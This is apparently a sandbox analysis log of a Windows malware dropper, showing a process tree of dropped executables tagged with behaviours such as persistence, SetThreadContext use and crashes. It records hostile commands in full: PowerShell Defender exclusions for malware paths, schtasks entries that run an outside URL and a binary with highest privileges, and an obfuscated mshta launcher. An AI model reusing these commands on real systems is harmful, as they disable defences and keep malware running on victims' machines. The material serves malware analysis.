C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp" /SL5="$10214,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5204
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeWed121f7e9e92793cf.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4616
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exe2⤵
- Executes dropped EXE
PID:5512
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1229427acd4bc167.exeWed1229427acd4bc167.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2280
C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"2⤵
- Executes dropped EXE
PID:5692
C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"2⤵
- Executes dropped EXE
PID:2536
C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:1088
C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:5560
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat"4⤵PID:3020
C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:5744
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat"4⤵PID:6848
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:2196
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:820
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵PID:6916
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:7684
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵PID:5800
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵PID:6440
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵PID:552
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4264
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "https://nougacoush.com/link?z=4569148" /tn "AV GORelease" /sc ONCE /st 8:36 /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:7044
C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"3⤵PID:5640
C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"4⤵PID:5548
C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"4⤵PID:2616
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"4⤵PID:7376
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe" -u5⤵PID:9068
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in Windows directory
PID:6316
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"4⤵PID:6560
-
-
C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"4⤵PID:6420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4036
-
-
-
[4] C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe"
    PID: 8036

[5] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 300
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 5352

[4] C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe"
    - Loads dropped DLL
    PID: 2964

[5] C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
    - Loads dropped DLL
    - Adds Run key to start application
    PID: 5384

[6] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
    PID: 7532

[7] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d8,0x1d4,0x1d0,0x1fc,0x1cc,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee0
    PID: 4888

[8] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e90
    PID: 7192

[7] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1784,16950138151266137069,1560590402343067924,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7532_322797412" --mojo-platform-channel-handle=1640 /prefetch:8
    PID: 5340

[4] C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"
    PID: 6532

[5] C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
    PID: 6296

[6] C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ) do taskkill -f -iM "%~NxM"
    PID: 2912

[7] C:\Windows\SysWOW64\taskkill.exe
    Command line: taskkill -f -iM "twj_PyqVenFial9ZxFhPbo72.exe"
    - Kills process with taskkill
    PID: 4228
[4] C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"
    PID: 940

[5] C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp" /SL5="$2057A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"
    - Loads dropped DLL
    PID: 7940

[6] C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe" /S /UID=2709
    - Drops file in Drivers directory
    PID: 7308

[7] C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe"
    PID: 5780

[8] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive & exit
    PID: 6040

[9] C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive
    PID: 6460

[10] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 236
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 5416

[8] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654" & exit
    PID: 8404

[9] C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654"
    PID: 3320

[8] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe & exit
    PID: 7696

[9] C:\Windows\System32\Conhost.exe
    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5164

[9] C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe
    PID: 6176

[10] C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe" -u
    PID: 5668

[11] C:\Windows\System32\Conhost.exe
    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID: 6040

[8] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive & exit
    PID: 2428

[9] C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive
    PID: 8448

[8] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy1l3ab4.gs5\autosubplayer.exe /S & exit
    PID: 6252
[3] C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    - Creates scheduled task(s)
    PID: 2372

[3] C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    - Creates scheduled task(s)
    PID: 2156

[2] C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID: 5420

[2] C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID: 6996

[2] C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe
    Command line: "C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"
    - Executes dropped EXE
    PID: 1596

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 280
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 6328

[1] C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed126ca6605dbec0399.exe
    Command line: Wed126ca6605dbec0399.exe /mixone
    - Executes dropped EXE
    PID: 3764

[2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 240
    - Program crash
    PID: 2608

[1] C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe
    Command line: Wed120b6f5c6d562.exe
    - Executes dropped EXE
    PID: 3832

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2116 -ip 2116
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 4048

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3764 -ip 3764
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 2592

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 1116
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5144
[1] C:\Windows\system32\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
    PID: 6112

[2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 3228

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 456
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 988

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3228 -ip 3228
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5312

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 408 -ip 408
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 4880

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2960 -ip 2960
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 1304

[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of AdjustPrivilegeToken
    PID: 5732

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5824 -ip 5824
    PID: 6828

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5932 -ip 5932
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 7000

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5816 -ip 5816
    PID: 6748

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6820 -ip 6820
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5848

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2432 -ip 2432
    PID: 5844

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5984 -ip 5984
    PID: 3472

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6788 -ip 6788
    PID: 3472

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6852 -ip 6852
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5568

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 3036 -ip 3036
    PID: 5164

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1596 -ip 1596
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 6020

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6892 -ip 6892
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 2000

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 6608 -ip 6608
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 3496

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2536 -ip 2536
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5760

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2200 -ip 2200
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 7360

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 6176 -ip 6176
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 496

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5984 -ip 5984
    PID: 1616
[1] C:\Windows\system32\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
    PID: 6580

[2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 5952

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 420
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 4584

[1] C:\Windows\System32\WaaSMedicAgent.exe
    Command line: C:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.0
    - Modifies data under HKEY_USERS
    PID: 1116

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5952 -ip 5952
    PID: 3812

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7384 -ip 7384
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 3812

[1] C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -pss -s 708 -p 7496 -ip 7496
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5664

[1] C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -pss -s 424 -p 1064 -ip 1064
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5488

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8924 -ip 8924
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 6848

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5608 -ip 5608
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 736

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 9128 -ip 9128
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 3628

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3404 -ip 3404
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 4432

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8036 -ip 8036
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 1464

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6420 -ip 6420
    PID: 8396

[1] C:\Windows\system32\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
    PID: 8600

[2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 400

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 448
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID: 7380

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 400 -ip 400
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 6744
[1] C:\Windows\System32\Conhost.exe
    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    PID: 6788

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2440 -ip 2440
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Executes dropped EXE
    PID: 3036

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 2312 -ip 2312
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 1616

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9072 -ip 9072
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 6904

[1] C:\Windows\system32\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
    PID: 7664

[2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 8884

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 456
    - Program crash
    PID: 3016

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 456
    - Program crash
    PID: 5112

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 8884 -ip 8884
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 5464

[1] C:\Windows\system32\compattelrunner.exe
    Command line: C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
    - Modifies data under HKEY_USERS
    PID: 8812

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 8516 -ip 8516
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 8688

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 8516 -ip 8516
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 7684

[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
    - Modifies data under HKEY_USERS
    PID: 2044

[1] C:\Windows\System32\CompPkgSrv.exe
    Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 7448

[1] C:\Windows\system32\WerFault.exe
    Command line: "C:\Windows\system32\WerFault.exe" -k -lc WATCHDOG WATCHDOG-20211108-0823.dmp
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID: 5736

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8540 -ip 8540
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 6860

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2156 -ip 2156
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 3300

